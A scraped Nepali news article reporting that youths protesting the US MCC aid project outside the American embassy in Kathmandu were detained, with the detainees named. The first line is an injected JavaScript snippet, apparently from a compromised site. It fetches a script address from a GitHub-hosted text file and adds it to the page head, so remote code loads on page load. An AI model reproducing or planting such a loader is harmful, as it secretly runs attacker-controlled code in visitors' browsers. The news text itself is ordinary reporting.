;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली, न्यूज काठमाण्डौ |अमेरिकी सहयोग परियोजना एमसीसी खारेज गर्न माग गर्दै काठमाडौंस्थित अमेरिकी दूतावास अगाडि युवाहरुले प्रदर्शन गरेका छन् । प्रदर्शन गर्नेहरुलाई प्रहरीले नियन्त्रणमा लिएको छ ।
‘एमसीसी खारेज राष्ट्रिय अभियान’को नामबाट युवाहरु प्रदर्शनमा उत्रिएका थिए । उनीहरुलाई तत्कालै प्रहरीले नियन्त्रणमा लिएको थियो ।
अभियानका संयोजक निर्ग जैसी (नवीन)ले आफूसहित १० जनालाई प्रहरीले नियन्त्रणमा लिएर महाराजगञ्जमा राखेको बताए । पक्राउ पर्नेहरुमा जैसीसहित, जनक ढुंगाना, सम्राट थापा, कुलदीप शर्मा, सुरज तामाङ, टेकम बिसी, मोहमद नसिर, दुर्गा जोशी, केदार थामी र सुशील नेपाली छन् ।
जैसी माओवादी केन्द्र सम्बद्ध अखिल क्रान्तिकारीका केन्द्रीय सदस्यसमेत हुन् । उनले आफ्नो नेतृत्वमा एक हजार एक जनाको ‘एमसीसी खारेज राष्ट्रिय अभियान’ गठन गरेको बताए । आजको विरोध प्रदर्शन भने काठमाडौं जिल्ला समितिका सम्राट थापाले आयोजना गरेको उनले बताए ।
फेसबुक प्रतिक्रियाहरु